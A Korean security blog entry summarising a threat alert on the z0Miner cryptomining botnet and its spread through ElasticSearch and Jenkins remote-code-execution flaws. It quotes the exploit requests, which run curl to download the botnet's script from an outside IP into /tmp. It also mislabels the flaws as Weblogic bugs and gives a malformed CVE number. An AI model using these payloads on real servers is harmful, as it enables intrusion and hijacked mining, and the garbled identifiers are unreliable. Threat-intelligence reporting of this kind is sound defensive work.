[하루한줄] z0Miner: Mining Botnet Spreading quickly

URL

Threat Alert: z0Miner Is Spreading quickly by Exploiting ElasticSearch and Jenkins Vulnerabilities

Explain

최근 비트코인의 상승과 함께 다양한 채굴 봇넷 공격이 늘어났습니다. 대부분 감염 방식을 바꿨을 뿐 오래된 봇넷이며 그중 z0Miner도 포함되어 있습니다. z0Miner는 2가지 Weblogic RCE 취약점을 사용해 전파됩니다. z0Miner는 아래 두 취약점을 사용해 타겟 시스템에 hxxp://27.1.1.34:8080/docs/conf.txt를 설치하고 실행합니다.

ElasticSearch RCE (CVE-2021-2015-1427)

POST /{VULN_URI} HTTP/1.1
Host: {target}:{port}

{...exec(\"curl -fsSL http://27.1.1.34:8080/docs/conf.txt -o /tmp/baby\")...}

Jenkins script console RCE

POST /{VULN_URI} HTTP/1.1
Host: {target}:{port}

curl+-fsSL+http%3A%2F%2F27.1.1.34:8080%2Fdocs%2Fconf.txt+-o+%2Ftmp%2Fsolr%22.execute%28%29.text&json=%7B%22script%22%3A+%22println+%5C%22curl+-fsSL+http%3A%2F%2F27.1.1.34:8080%2Fdocs%2Fconf.txt+-o+%2Ftmp%2Fsolr%5C%22.execute%28%29.text%22%2C+%22%22%3A+%22%22%7D&Submit=Run

타겟 시스템에 설치된 hxxp://27.1.1.34:8080/docs/conf.txt는 다음과 같은 동작을 합니다.

타겟 시스템에 다른 채굴 봇넷이 존재하면 그 봇넷을 종료
추가 악성 스크립트를 설치
채굴 프로그램 설치 및 실행

1day1line

Fabu1ous botnet bitcoin monroe mining

Fabu1ous

본 글은 CC BY-SA 4.0 라이선스로 배포됩니다. 공유 또는 변경 시 반드시 출처를 남겨주시기 바랍니다.

[Research] 시간을 여행하는 해커를 위한 안내서 Part3 Previous

[하루한줄] CVE-2021-22992: BIG-IP ASM의 stack buffer overflow 취약점 Next